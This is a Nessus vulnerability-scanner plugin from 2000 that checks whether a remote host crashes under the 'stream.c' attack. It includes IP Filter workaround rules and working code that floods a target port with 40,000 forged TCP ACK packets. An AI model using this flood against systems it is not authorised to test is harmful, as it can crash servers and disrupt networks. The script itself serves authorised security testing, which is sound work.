1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
|
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
if(description)
{
script_id(10271);
name["english"] = "stream.c";
name["francais"] = "stream.c";
script_name(english:name["english"], francais:name["francais"]);
desc["english"] = "It was possible
to make the remote server crash
using the 'stream.c' attack.
A cracker may use this attack to
shut down this server, thus
preventing your network from
working properly.
Solution : contact your operating
system vendor for a patch.
Workaround : if you use IP filter,
then add these rules :
block in quick proto tcp from any to any head 100
pass in quick proto tcp from any to any flags S keep state group 100
pass in all
Risk factor : High";
desc["francais"] = "Il s'est avr
possible de faire planter la
machine distante en utilisant
l'attaque 'stream.c'.
Un pirate peut utiliser cette
attaque pour empecher votre
rseau de fonctionner normallement.
Solution : contactez le vendeur
de votre OS pour un patch.
Solution temporaire : Si vous
utilisez IP filter, alors ajoutez
ces rgles :
block in quick proto tcp from any to any head 100
pass in quick proto tcp from any to any flags S keep state group 100
pass in all
Facteur de risque : Elev";
script_description(english:desc["english"], francais:desc["francais"]);
summary["english"] = "Crashes the remote host using the 'stream.c' attack";
summary["francais"] = "Plante le serveur distant en utilisant l'attaque 'stream.c'";
script_summary(english:summary["english"], francais:summary["francais"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
family["english"] = "Denial of Service";
family["francais"] = "Dni de service";
script_family(english:family["english"], francais:family["francais"]);
exit(0);
}
#
# The script code starts here
#
addr = this_host();
id = rand();
sport = rand();
seq = rand();
port = get_host_open_port();
if(!port)port = rand();
start_denial();
for(i=0;i<40000;i=i+1)
{
id = id + 1;
sport = sport + 1;
seq = seq+1;
ip = forge_ip_packet( ip_v : 4,
ip_hl : 5,
ip_tos : 0x08,
ip_len : 20,
ip_id : id,
ip_p : IPPROTO_TCP,
ip_ttl : 255,
ip_off : 0,
ip_src : addr);
tcpip = forge_tcp_packet( ip : ip,
th_sport : sport,
th_dport : port,
th_flags : TH_ACK,
th_seq : seq,
th_ack : 0,
th_x2 : 0,
th_off : 5,
th_win : 2048,
th_urp : 0);
send_packet(tcpip, pcap_active:FALSE);
}
alive = end_denial();
if(!alive) {
set_kb_item(name:"Host/dead", value:TRUE);
security_hole(0);
}
|
